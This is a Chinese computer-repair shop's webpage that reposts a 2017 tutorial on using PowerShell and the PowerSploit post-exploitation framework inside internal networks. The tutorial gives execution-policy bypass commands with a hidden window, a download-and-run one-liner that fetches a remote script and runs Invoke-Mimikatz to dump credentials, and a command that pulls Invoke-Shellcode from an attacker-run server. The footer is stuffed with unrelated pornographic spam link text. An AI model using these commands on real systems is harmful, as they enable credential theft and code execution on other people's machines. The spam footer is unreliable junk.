錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務(wù)項目 服務(wù)報價 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù)技術(shù)文章
[安全]解析在內(nèi)網(wǎng)Powersploit滲透中的使用

作者: 佚名  日期:2017-04-14 07:35:07   來源: 本站整理

一.Powershell

我們先來說說powershell,PowerShell 是運行在 Windows上實現(xiàn)系統(tǒng)和應(yīng)用程序管理自動化的命令行腳本環(huán)境。你可以把它看成是命令行提示符 cmd.exe 的擴(kuò)充,或是顛覆。Powershell需要.NET環(huán)境的支持,同時支持.NET對象。其可讀性,易用性,可以位居當(dāng)前所有 shell 之首。

這是別人說的,不過稍微研究下覺得,哇塞,這東西真的挺牛的,除了語法麻煩以外,剩下都挺好,不過語法麻煩讓我們這種英文不好的人怎么玩啊

當(dāng)前 PowerShell 有五個版本,分別為 1.0,2.0,3.0,4.0,5.0

當(dāng)時看別人的文章都說是有四個版本,但是我打開windows10看一眼,恩,微軟更新了,windows10自帶的5.(好幾)的版本啊

先來看看他的基本命令:

 新建目錄 New-Item whitecellclub -ItemType Directory

 新建文件 New-Item light.txt -ItemType File

 刪除目錄 Remove-Item whitecellclub

 顯示文本內(nèi)容 Get-Content light.txt

 設(shè)置文本內(nèi)容 Set-Content light.txt -Value “i love light so much”

 追加內(nèi)容 Add-Content light.txt -Value “but i love you more”

 清除內(nèi)容 Clear-Content light.txt

看看吧,什么感覺,你還喜歡他么?

不過好在,微軟也想到了這個問題,我們可以用windows下的命令跟Linux下的命令,比如:

這里說一下,我們怎么看我們powershell的版本,

Get-Host

這個是虛擬機(jī)的win7,所以是2.0的版本

powershell還有一些比較叼的用法:

本地權(quán)限繞過執(zhí)行

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

本地隱藏權(quán)限繞過執(zhí)行腳本

PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive
-NoProfile -WindowStyle Hidden(隱藏窗口) -File xxx.ps1

直接用IEX下載遠(yuǎn)程的PS1腳本回來權(quán)限繞過執(zhí)行

powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-
Mimikatz -DumpCreds"

我們可以來試一下:

這個命令是可以看到我們的版本的

完美繞過!(ps:這里說一下,ps1結(jié)尾的是powershell腳本,大家可以自己去研究下,我這里就不在贅述了,因為我也不會寫這種腳本)

二. Powersploit

介紹完了,我們開始我們的正題吧 Powersploit在內(nèi)網(wǎng)滲透中的使用

powersploit一款基于powershell的后滲透(Post-Exploitation)框架,集成大量滲透相關(guān)模塊和功能。

github地址: https://github.com/mattifestation/PowerSploit

這里才是重點,我們開始吧:

首先,我在我本機(jī)上下載這個腳本文件

ps:我本機(jī)用的是ubuntu,所以我這里就用ubuntu代替kali的操作

下載完成之后,我們把我們下載的文件放到apache目錄小,讓我們可以遠(yuǎn)程下載,然后啟動apache

service apache2 start

然后我們訪問我們的127.0.0.1  保證我們可以訪問的到

他的目錄就跟metasploit一樣,分工明確

CodeExecution 在目標(biāo)主機(jī)執(zhí)行代碼

ScriptModification 在目標(biāo)主機(jī)上創(chuàng)建或修改腳本

Persistence 后門腳本(持久性控制)

AntivirusBypass 發(fā)現(xiàn)殺軟查殺特征

Exfiltration 目標(biāo)主機(jī)上的信息搜集工具

Mayhem 藍(lán)屏等破壞性腳本

Recon 以目標(biāo)主機(jī)為跳板進(jìn)行內(nèi)網(wǎng)信息偵查

(1). Invoke-Shellcode

我們使用 Invoke-Shellcode

Invoke-Shellcode的作用:將shellcode插入您選擇的進(jìn)程ID或本地PowerShell中。

Invoke-Shellcode配合上metasploit,可以達(dá)到意想不到的效果

現(xiàn)在主機(jī)上下載我們的腳本(當(dāng)然,你也可以直接從github上去下載,也可以從我們本機(jī)下載)

IEX (New-Object Net.WebClient).DownloadString("http://IP Adress/CodeExecution/Invoke--Shellcode.ps1")


熱門文章
  • 機(jī)械革命S1 PRO-02 開機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡(luò)請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開機(jī)界面...
  • 常見打印機(jī)清零步驟
  • 安裝驅(qū)動時提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 国产成人无码网站| 亚洲av中文无码乱人伦在线播放| 精品国产性色无码AV网站| 日韩精品无码久久久久久| 少妇特殊按摩高潮惨叫无码| 丰满少妇人妻无码专区| 色窝窝无码一区二区三区| 久久久无码人妻精品无码| 亚洲v国产v天堂a无码久久| 亚洲av永久无码精品秋霞电影秋| 精品久久久无码中文字幕天天| 亚洲AV无码AV日韩AV网站| 无码乱码观看精品久久 | (无码视频)在线观看 | 无码精品人妻一区二区三区免费看| 亚洲熟妇无码AV| 亚洲成a人无码亚洲成av无码| 亚洲一区无码精品色| 久久精品无码一区二区三区免费 | 无码精品A∨在线观看十八禁| 亚洲国产精品无码专区在线观看| 精品久久久久久无码中文字幕漫画 | 少妇人妻无码专区视频| 中文字幕乱妇无码AV在线| 国产高新无码在线观看| 无码一区二区三区中文字幕| 亚洲av无码久久忘忧草| 久久久久无码精品国产h动漫 | 国产成人午夜无码电影在线观看| 无码中文字幕色专区| 精品国产性色无码AV网站| 69成人免费视频无码专区| 亚洲成a人无码亚洲成av无码| 99精品一区二区三区无码吞精| 无码国产精品一区二区免费式芒果| 国内精品人妻无码久久久影院| 无码精品人妻一区二区三区免费看 | 无码h黄肉3d动漫在线观看| 国产精品无码一区二区三区不卡| 西西人体444www大胆无码视频| 色欲AV永久无码精品无码|